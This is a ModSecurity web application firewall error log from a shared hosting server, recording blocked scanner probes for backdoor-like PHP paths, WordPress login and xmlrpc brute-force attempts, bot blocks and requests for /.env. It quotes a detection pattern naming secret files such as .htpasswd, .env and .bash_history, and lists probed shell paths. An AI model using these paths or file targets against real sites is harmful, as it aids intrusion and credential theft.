[Tue May 26 17:12:45.916643 2026] [security2:error] [pid 860158:tid 860299] [client 45.86.200.11:54867] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 11.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-admin/maint/bootstrap.php"] [unique_id "ahWHNYYFlz_JJsUnscK3UgAAAJA"]
[Tue May 26 17:12:46.087972 2026] [security2:error] [pid 860158:tid 860364] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHNYYFlz_JJsUnscK3TgAAANE"]
[Tue May 26 17:12:47.219475 2026] [security2:error] [pid 860158:tid 860381] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHNoYFlz_JJsUnscK3bQAAAOI"]
[Tue May 26 17:12:47.492066 2026] [security2:error] [pid 860158:tid 860200] [remote 103.11.102.106:59948] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahWHN4YFlz_JJsUnscK3dwAAiik"]
[Tue May 26 17:12:48.002546 2026] [security2:error] [pid 860158:tid 860414] [client 45.86.200.12:33655] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/themes/zMousse/otuz1.php"] [unique_id "ahWHN4YFlz_JJsUnscK3hQAAAQM"]
[Tue May 26 17:12:48.778374 2026] [security2:error] [pid 860158:tid 860323] [client 2.57.122.173:49246] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jhonweb.com"] [uri "/secrets/.env"] [unique_id "ahWHOIYFlz_JJsUnscK3mQAAAKg"]
[Tue May 26 17:12:48.925268 2026] [security2:error] [pid 860158:tid 860311] [client 45.86.200.41:57167] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 41.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-content/edit-wolf.php"] [unique_id "ahWHOIYFlz_JJsUnscK3ngAAAJw"]
[Tue May 26 17:12:48.983496 2026] [security2:error] [pid 860158:tid 860367] [client 2.57.122.173:49266] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jhonweb.com"] [uri "/.env"] [unique_id "ahWHOIYFlz_JJsUnscK3oAAAANQ"]
[Tue May 26 17:12:49.664388 2026] [security2:error] [pid 860158:tid 860366] [client 2.57.122.173:49250] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahWHOIYFlz_JJsUnscK3mgAAANM"]
[Tue May 26 17:12:49.665423 2026] [security2:error] [pid 860158:tid 860340] [client 2.57.122.173:49252] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahWHOIYFlz_JJsUnscK3nwAAALk"]
[Tue May 26 17:12:49.665860 2026] [security2:error] [pid 860158:tid 860385] [client 2.57.122.173:49234] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahWHOIYFlz_JJsUnscK3mAAAAOY"]
[Tue May 26 17:12:50.172230 2026] [security2:error] [pid 860158:tid 860318] [client 203.194.101.7:64498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHOoYFlz_JJsUnscK3vgAAAKM"]
[Tue May 26 17:12:50.172371 2026] [security2:error] [pid 860158:tid 860318] [client 203.194.101.7:64498] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHOoYFlz_JJsUnscK3vgAAAKM"]
[Tue May 26 17:12:50.176893 2026] [security2:error] [pid 860158:tid 860319] [client 45.86.200.19:35141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-content/plugins/ubh/up.php"] [unique_id "ahWHOoYFlz_JJsUnscK3uQAAAKQ"]
[Tue May 26 17:12:51.135541 2026] [security2:error] [pid 860158:tid 860403] [client 45.86.200.13:41737] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-admin/images/bootstrap.php"] [unique_id "ahWHO4YFlz_JJsUnscK32AAAAPg"]
[Tue May 26 17:12:51.140820 2026] [security2:error] [pid 860158:tid 860389] [client 2.57.122.173:49270] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahWHO4YFlz_JJsUnscK31wAAAOo"]
[Tue May 26 17:12:52.147356 2026] [security2:error] [pid 860158:tid 860350] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHO4YFlz_JJsUnscK37wAAAMM"]
[Tue May 26 17:12:52.356443 2026] [security2:error] [pid 860158:tid 860410] [client 45.86.200.19:57647] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/images/upload.php"] [unique_id "ahWHPIYFlz_JJsUnscK4AQAAAP8"]
[Tue May 26 17:12:53.558549 2026] [security2:error] [pid 860158:tid 860337] [client 103.174.5.177:64490] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHPYYFlz_JJsUnscK4FgAAALY"]
[Tue May 26 17:12:53.558724 2026] [security2:error] [pid 860158:tid 860337] [client 103.174.5.177:64490] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHPYYFlz_JJsUnscK4FgAAALY"]
[Tue May 26 17:12:53.788313 2026] [security2:error] [pid 860158:tid 860296] [client 45.86.200.42:62127] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-content/plugins/seoplugins/db.php"] [unique_id "ahWHPYYFlz_JJsUnscK4HAAAAI0"]
[Tue May 26 17:12:54.328261 2026] [security2:error] [pid 860158:tid 860357] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHPYYFlz_JJsUnscK4IgAAAMo"]
[Tue May 26 17:12:55.784903 2026] [security2:error] [pid 860158:tid 860394] [client 45.86.200.18:64791] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-content/themes/pridmag/db.php"] [unique_id "ahWHP4YFlz_JJsUnscK4UwAAAO8"]
[Tue May 26 17:12:56.363218 2026] [security2:error] [pid 860158:tid 860327] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHP4YFlz_JJsUnscK4WwAAAKw"]
[Tue May 26 17:12:56.684191 2026] [security2:error] [pid 860158:tid 860340] [client 45.86.200.11:27415] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 11.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-content/plugins/linkpreview/db.php"] [unique_id "ahWHQIYFlz_JJsUnscK4agAAALk"]
[Tue May 26 17:12:57.441810 2026] [security2:error] [pid 860158:tid 860243] [remote 74.7.241.58:44660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWHQYYFlz_JJsUnscK4fgAAsFQ"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 17:12:57.681872 2026] [security2:error] [pid 860158:tid 860248] [remote 185.15.230.106:46594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.230.15.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWHQYYFlz_JJsUnscK4ggAA9Fk"]
[Tue May 26 17:12:58.863287 2026] [security2:error] [pid 860158:tid 860390] [client 45.86.200.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHQYYFlz_JJsUnscK4iAAAAOs"]
[Tue May 26 17:12:59.117837 2026] [security2:error] [pid 860158:tid 860403] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHQoYFlz_JJsUnscK4oQAAAPg"]
[Tue May 26 17:12:59.491119 2026] [security2:error] [pid 860158:tid 860289] [client 45.86.200.28:26607] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/modules/mod_simplefileuploadv1.3/elements/udd.php"] [unique_id "ahWHQ4YFlz_JJsUnscK4uQAAAIY"]
[Tue May 26 17:13:00.215089 2026] [security2:error] [pid 860158:tid 860266] [remote 74.208.170.33:58776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.170.208.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWHRIYFlz_JJsUnscK4xgAA72s"]
[Tue May 26 17:13:00.619486 2026] [security2:error] [pid 860158:tid 860393] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHRIYFlz_JJsUnscK4yQAAAO4"]
[Tue May 26 17:13:00.643169 2026] [security2:error] [pid 860158:tid 860404] [client 203.194.101.7:64860] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHRIYFlz_JJsUnscK42gAAAPk"]
[Tue May 26 17:13:00.643348 2026] [security2:error] [pid 860158:tid 860404] [client 203.194.101.7:64860] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHRIYFlz_JJsUnscK42gAAAPk"]
[Tue May 26 17:13:00.997099 2026] [security2:error] [pid 860158:tid 860335] [client 78.46.190.63:16480] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWHRIYFlz_JJsUnscK44gAAALQ"], referer: https://thegoodsporting.com
[Tue May 26 17:13:01.010983 2026] [security2:error] [pid 860158:tid 860255] [remote 211.23.68.235:13201] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWHRIYFlz_JJsUnscK44QAAq2A"]
[Tue May 26 17:13:02.191044 2026] [security2:error] [pid 860158:tid 860372] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHRYYFlz_JJsUnscK48wAAANk"]
[Tue May 26 17:13:02.234567 2026] [security2:error] [pid 860158:tid 860303] [client 45.86.200.13:47569] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-content/plugins/pwnd/pwnd.php"] [unique_id "ahWHRoYFlz_JJsUnscK5BAAAAJQ"]
[Tue May 26 17:13:04.275675 2026] [security2:error] [pid 860158:tid 860399] [client 45.86.200.34:39243] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-content/plugins/pwnd-1/pwnd.php"] [unique_id "ahWHSIYFlz_JJsUnscK5NwAAAPQ"]
[Tue May 26 17:13:04.346229 2026] [security2:error] [pid 860158:tid 860410] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHR4YFlz_JJsUnscK5LQAAAP8"]
[Tue May 26 17:13:04.658798 2026] [security2:error] [pid 860158:tid 860300] [client 185.191.171.8:56702] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-10-14/list/"] [unique_id "ahWHSIYFlz_JJsUnscK5QQAAAJE"]
[Tue May 26 17:13:04.659022 2026] [security2:error] [pid 860158:tid 860300] [client 185.191.171.8:56702] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-10-14/list/"] [unique_id "ahWHSIYFlz_JJsUnscK5QQAAAJE"]
[Tue May 26 17:13:06.472512 2026] [security2:error] [pid 860158:tid 860390] [client 45.86.200.36:26303] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-admin/css/colors/midnight/admin.php"] [unique_id "ahWHSoYFlz_JJsUnscK5ZQAAAOs"]
[Tue May 26 17:13:08.436981 2026] [security2:error] [pid 860158:tid 860316] [client 45.86.200.22:61179] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/kill.php"] [unique_id "ahWHTIYFlz_JJsUnscK5lwAAAKE"]
[Tue May 26 17:13:08.469349 2026] [security2:error] [pid 860158:tid 860368] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHTIYFlz_JJsUnscK5jAAAANU"]
[Tue May 26 17:13:08.583016 2026] [security2:error] [pid 860158:tid 860309] [client 103.174.5.177:44413] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHTIYFlz_JJsUnscK5jQAAAJo"]
[Tue May 26 17:13:08.583136 2026] [security2:error] [pid 860158:tid 860309] [client 103.174.5.177:44413] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHTIYFlz_JJsUnscK5jQAAAJo"]
[Tue May 26 17:13:09.585809 2026] [security2:error] [pid 860158:tid 860297] [client 51.89.129.187:63996] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.ameritradeng.com"] [uri "/robots.txt"] [unique_id "ahWHTYYFlz_JJsUnscK5wQAAAI4"]
[Tue May 26 17:13:09.585964 2026] [security2:error] [pid 860158:tid 860297] [client 51.89.129.187:63996] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ameritradeng.com"] [uri "/robots.txt"] [unique_id "ahWHTYYFlz_JJsUnscK5wQAAAI4"]
[Tue May 26 17:13:09.848313 2026] [security2:error] [pid 860158:tid 860300] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHTYYFlz_JJsUnscK5vgAAAJE"]
[Tue May 26 17:13:10.907721 2026] [security2:error] [pid 860158:tid 860295] [client 142.44.233.97:26548] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.ameritradeng.com"] [uri "/"] [unique_id "ahWHToYFlz_JJsUnscK57AAAAIw"]
[Tue May 26 17:13:10.907867 2026] [security2:error] [pid 860158:tid 860295] [client 142.44.233.97:26548] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ameritradeng.com"] [uri "/"] [unique_id "ahWHToYFlz_JJsUnscK57AAAAIw"]
[Tue May 26 17:13:11.068746 2026] [security2:error] [pid 860158:tid 860340] [client 203.194.101.7:65311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHToYFlz_JJsUnscK57QAAALk"]
[Tue May 26 17:13:11.068916 2026] [security2:error] [pid 860158:tid 860340] [client 203.194.101.7:65311] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHToYFlz_JJsUnscK57QAAALk"]
[Tue May 26 17:13:11.080780 2026] [security2:error] [pid 860158:tid 860383] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHToYFlz_JJsUnscK53AAAAOQ"]
[Tue May 26 17:13:11.995358 2026] [security2:error] [pid 860158:tid 860351] [client 207.154.223.17:35758] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "paqys.com"] [uri "/index.php"] [unique_id "ahWHT4YFlz_JJsUnscK5_AAAAMQ"]
[Tue May 26 17:13:12.370941 2026] [security2:error] [pid 860158:tid 860288] [client 45.224.189.217:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHT4YFlz_JJsUnscK6CQAAAIU"]
[Tue May 26 17:13:13.203924 2026] [security2:error] [pid 860158:tid 860383] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHUIYFlz_JJsUnscK6IwAAAOQ"]
[Tue May 26 17:13:13.588757 2026] [security2:error] [pid 860158:tid 860395] [client 114.119.136.66:59809] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "grandconclaveindia.org.in"] [uri "/images/osm_Issachertomb.jpg"] [unique_id "ahWHUYYFlz_JJsUnscK6OAAAAPA"], referer: http://www.dahabsafari.info/productlist-Collectables-Masonic/efn-812169-Ritual-Order-of-the-Secret-Monitor-No-OSM-Induction-Anon/
[Tue May 26 17:13:14.069486 2026] [security2:error] [pid 860158:tid 860316] [client 45.86.200.31:31601] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-includes/style-engine/worksec.php"] [unique_id "ahWHUYYFlz_JJsUnscK6QAAAAKE"]
